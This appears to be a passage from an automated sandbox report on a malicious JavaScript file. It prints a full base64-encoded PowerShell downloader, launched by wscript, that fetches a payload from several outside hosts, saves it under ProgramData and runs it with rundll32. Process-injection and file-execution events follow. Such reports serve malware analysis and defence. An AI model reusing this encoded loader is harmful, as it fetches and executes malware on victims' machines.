GIAaQBjAGEAbABsAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFEAQQBOAFEAQQB1AEEARABJAEEATgBBAEEAMgBBAEMANABBAE4AZwBBADUAQQBDADQAQQBNAFEAQQB6AEEARABVAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVQBuAGQAZQByAHUAdABpAGwAaQB6AGUALgBHAG8AdgBlAHIAbgBpAG4AZwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANQAyADkAOAA0ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARgBVAEEAYgBnAEIAawBBAEcAVQBBAGMAZwBCADEAQQBIAFEAQQBhAFEAQgBzAEEARwBrAEEAZQBnAEIAbABBAEMANABBAFIAdwBCAHYAQQBIAFkAQQBaAFEAQgB5AEEARwA0AEEAYQBRAEIAdQBBAEcAYwBBAEwAQQBCAGkAQQBHAGsAQQBiAGcAQgBrAEEARABzAEEAIgA7ACQAYgBpAGEAbgBuAHUAYQBsAGwAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAbwBBAEcARQBBAGIAQQBCAHMAQQBHAEUAQQBhAEEAQQB1AEEARwBNAEEAYgB3AEIAdABBAEgAQQBBAGQAUQBCADAAQQBHAFUAQQBjAGcAQQA9AGQAWQBIAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGMAZwBCAHYAQQBHAFUAQQBiAGcAQgBzAEEARwBFAEEAYwBnAEIAbgBBAEcAVQBBAGIAUQBCAGwAQQBHADQAQQBkAEEAQgBQAEEARwBNAEEAZABBAEIAdgBBAEcAUQBBAFkAUQBCAGoAQQBIAFEAQQBlAFEAQgBzAEEARwA4AEEAZABRAEIAegBBAEMANABBAFoAdwBCAGgAQQBHAHcAQQBiAEEAQgBsAEEASABJAEEAZQBRAEEAPQBkAFkASABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEkAQQBOAGcAQQB1AEEARABFAEEATgBnAEEANQBBAEMANABBAE4AdwBBADIAQQBDADQAQQBOAFEAQQAxAEEAQQA9AD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAA7AH0AfQA="
parent_process	wscript.exe	martian_process	powershell -encodedcommand "JABFAGwAdQBhAHQAZQBkAEEAcABsAGUAYwB0AHIAdQBtACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBsAEEASABFAEEAZABRAEIAcABBAEgATQBBAGEAUQBCAG4AQQBHADQAQQBZAFEAQgBzAEEAQwA0AEEAWgBRAEIAdQBBAEcAYwBBAGEAUQBCAHUAQQBHAFUAQQBaAFEAQgB5AEEAQQA9AD0AIgA7ACQAUwBjAGEAcgBjAGUAbgBlAHMAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGUAUQBCAGgAQQBHADQAQQBiAHcAQgB3AEEASABNAEEAYQBRAEIAaABBAEYAQQBBAGMAZwBCAGgAQQBHAFUAQQBjAHcAQgBwAEEARwBRAEEAYQBRAEIAaABBAEMANABBAFoAQQBCAHAAQQBIAEkAQQBaAFEAQgBqAEEASABRAEEAYgB3AEIAeQBBAEgAawBBAFIAcwBwAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGIAdwBCAHQAQQBHADAAQQBZAFEAQgB1AEEARwBRAEEAYwBnAEIAcABBAEcAVQBBAEwAZwBCADAAQQBHAGcAQQBaAFEAQgBoAEEASABRAEEAWgBRAEIAeQBBAEEAPQA9AFIAcwBwAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARABBAEcAVQBBAGMAZwBCAGgAQQBIAFUAQQBiAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFUAQQBCAGgAQQBIAEkAQQBkAEEAQgBwAEEARwBVAEEAYwB3AEEAdQBBAEcATQBBAFoAUQBCAHUAQQBIAFEAQQBaAFEAQgB5AEEAQQA9AD0AUgBzAHAAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABnAEEATgBnAEEAdQBBAEQARQBBAE4AQQBBADMAQQBDADQAQQBOAFEAQQAwAEEAQwA0AEEATgBBAEEANABBAEEAPQA9ACIAOwAkAFIAZQBtAGkAZwByAGEAdABpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AQQBBAHUAQQBEAEkAQQBNAEEAQQB3AEEAQwA0AEEATQBnAEEAMABBAEQAQQBBAEwAZwBBAHgAQQBEAFEAQQBOAEEAQQB2AEEASABvAEEAYgB3AEIAMABBAEQAZwBBAE0AZwBBAHYAQQBFAFEAQQBVAEEAQgBGAEEARwBjAEEAWQBnAEEAPQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE0AUQBBAHUAQQBEAEUAQQBPAFEAQQB4AEEAQwA0AEEATQBnAEEAeABBAEQAVQBBAEwAZwBBAHkAQQBEAFEAQQBOAGcAQQB2AEEASABRAEEATAB3AEIAVQBBAEYAWQBBAGMAdwBCAEIAQQBBAD0APQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE4AZwBBAHgAQQBDADgAQQBPAFEAQgBoAEEARABZAEEATgB3AEIAdwBBAEcAVQBBAGMAdwBBAHYAQQBFAGMAQQBXAGcAQQAwAEEARgBJAEEAUwBRAEIARwBBAEYAbwBBAFEAZwBCAHUAQQBBAD0APQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAawBBAEwAZwBBADUAQQBEAGcAQQBMAHcAQgBRAEEASABBAEEAVgBRAEIAWgBBAEYAZwBBAEwAdwBCAHYAQQBEAFEAQQBlAEEAQgBJAEEARwA4AEEAYwBRAEIAcwBBAEcAMABBAFcAQQBCAFYAQQBHAGsAQQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE0AUQBBAHcAQQBEAFEAQQBMAHcAQgBVAEEARQB3AEEAUgB3AEIAbwBBAEUANABBAFoAQQBBAHYAQQBFAE0AQQBNAGcAQgBwAEEARwBJAEEAYQBRAEIAUwBBAEgATQBBAFEAdwBCAHkAQQBFADgAQQBXAEEAQQA9ACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFQAcgBpAG0AbwBsAGUAYwB1AGwAYQByAEMAZQByAGEAdABvAGQAaQBkAGEAZQAgAGkAbgAgACQAUgBlAG0AaQBnAHIAYQB0AGkAbgBnACAALQBzAHAAbABpAHQAIAAiAFQAcABlAE4AIgApACAAewB0AHIAeQAgAHsAJABEAGUAbABpAHEAdQBpAHUAbQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIATgBBAEcAVQBBAGIAQQBCAHAAQQBIAEEAQQBiAHcAQgB1AEEARwBrAEEAYgBnAEIAaABBAEcAVQBBAFMAQQBCAHAAQQBHAHcAQQBiAEEAQgB2AEEARwBFAEEAWgBRAEIAawBBAEMANABBAFoAQQBCAHIAQQBBAD0APQBrAGIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBFAEEAZABRAEIAcABBAEgAWQBBAFoAUQBCAHkAQQBHAFUAQQBaAEEAQgBFAEEARwBrAEEAYwB3AEIAMABBAEcAVQBBAGIAZwBCAGsAQQBHAFUAQQBaAEEAQgBzAEEASABrAEEATABnAEIAbQBBAEcAOABBAGMAZwBCAHoAQQBHAEUAQQBiAEEAQgBsAEEAQQA9AD0AIgA7ACQAUABvAHIAbwBwAG8AcgBvACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBuAEEARwBFAEEAYgBBAEIAbABBAEgATQBBAFkAUQBCADEAQQBIAEkAQQBkAFEAQgB6AEEARgBBAEEAYwBnAEIAdgBBAEcATQBBAFoAUQBCAHkAQQBHAGsAQQBkAEEAQgBwAEEARwBNAEEATABnAEIAaQBBAEcARQBBAGMAZwBCAG4AQQBHAEUAQQBhAFEAQgB1AEEASABNAEEAIgA7ACQAcABvAGwAZQBzAHQAYQByAFAAbwBuAHQAaQBmAGkAYwBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVAByAGkAbQBvAGwAZQBjAHUAbABhAHIAQwBlAHIAYQB0AG8AZABpAGQAYQBlACkAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQAcABvAGwAZQBzAHQAYQByAFAAbwBuAHQAaQBmAGkAYwBlAHMAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVQBuAGQAZQByAHUAdABpAGwAaQB6AGUALgBHAG8AdgBlAHIAbgBpAG4AZwA7ACQAUwB0AHUAbgBuAGUAcgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBsAEEASABNAEEAWQB3AEIAeQBBAEcAawBBAFkAZwBCAGgAQQBHADQAQQBiAHcAQgBWAEEARwA0AEEAYwB3AEIAaABBAEcATQBBAGMAZwBCAGwAQQBHAFEAQQBMAGcAQgB5AEEARwBFAEEAWQB3AEIAcABBAEcANABBAFoAdwBBAD0AIgA7ACQAYwBvAHIAawBpAHIAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADgAQQBjAEEAQgB3AEEARwA4AEEAYwB3AEIAcABBAEgAUQBBAGEAUQBCAHcAQQBHADgAQQBiAEEAQgBoAEEASABJAEEAUQB3AEIANQBBAEgAUQBBAGIAdwBCAHQAQQBHAGsAQQBZAHcAQgB5AEEARwA4AEEAYwB3AEIAdgBBAEcAMABBAFoAUQBBAHUAQQBHAE0AQQBiAHcAQgB2AEEARwBzAEEAYQBRAEIAdQBBAEcAYwBBAFcAUwA9AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGEAQQBCAHYAQQBIAFEAQQBiAHcAQgAwAEEARwBVAEEAYgBBAEIAbABBAEgATQBBAFkAdwBCAHYAQQBIAEEAQQBhAFEAQgBqAEEARgBVAEEAYgBnAEIAaABBAEgAQQBBAGMAQQBCAHMAQQBHAEUAQQBkAFEAQgBrAEEARwBVAEEAWgBBAEEAdQBBAEcATQBBAFkAUQBCAHoAQQBHAEUAQQBXAFMAPQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFYAQQBHADQAQQBaAEEAQgBsAEEASABJAEEAWgBRAEIANQBBAEcAawBBAGIAZwBCAG4AQQBDADQAQQBhAHcAQgBwAEEASABRAEEAWQB3AEIAbwBBAEcAVQBBAGIAZwBBAD0AIgA7ACQAYgBhAHIAZwBoAGUAcwB0AHMAUwBhAHAAcgBvAGIAaQBjAGEAbABsAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFEAQQBOAFEAQQB1AEEARABJAEEATgBBAEEAMgBBAEMANABBAE4AZwBBADUAQQBDADQAQQBNAFEAQQB6AEEARABVAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVQBuAGQAZQByAHUAdABpAGwAaQB6AGUALgBHAG8AdgBlAHIAbgBpAG4AZwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANQAyADkAOAA0ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARgBVAEEAYgBnAEIAawBBAEcAVQBBAGMAZwBCADEAQQBIAFEAQQBhAFEAQgBzAEEARwBrAEEAZQBnAEIAbABBAEMANABBAFIAdwBCAHYAQQBIAFkAQQBaAFEAQgB5AEEARwA0AEEAYQBRAEIAdQBBAEcAYwBBAEwAQQBCAGkAQQBHAGsAQQBiAGcAQgBrAEEARABzAEEAIgA7ACQAYgBpAGEAbgBuAHUAYQBsAGwAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAbwBBAEcARQBBAGIAQQBCAHMAQQBHAEUAQQBhAEEAQQB1AEEARwBNAEEAYgB3AEIAdABBAEgAQQBBAGQAUQBCADAAQQBHAFUAQQBjAGcAQQA9AGQAWQBIAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGMAZwBCAHYAQQBHAFUAQQBiAGcAQgBzAEEARwBFAEEAYwBnAEIAbgBBAEcAVQBBAGIAUQBCAGwAQQBHADQAQQBkAEEAQgBQAEEARwBNAEEAZABBAEIAdgBBAEcAUQBBAFkAUQBCAGoAQQBIAFEAQQBlAFEAQgBzAEEARwA4AEEAZABRAEIAegBBAEMANABBAFoAdwBCAGgAQQBHAHcAQQBiAEEAQgBsAEEASABJAEEAZQBRAEEAPQBkAFkASABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEkAQQBOAGcAQQB1AEEARABFAEEATgBnAEEANQBBAEMANABBAE4AdwBBADIAQQBDADQAQQBOAFEAQQAxAEEAQQA9AD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAA7AH0AfQA="

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3036 resumed a thread in remote process 1604
Process injection	Process 1604 resumed a thread in remote process 568
NtResumeThread May 25, 2023, 10:43 a.m.	thread_handle: 0x00000338 suspend_count: 1 process_identifier: 1604	1	0	0
NtResumeThread May 25, 2023, 10:44 a.m.	thread_handle: 0x0000033c suspend_count: 1 process_identifier: 568	1	0	0

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (21 events)

file	C:\Windows\SysWOW64\wscript.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

envenomation.js

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All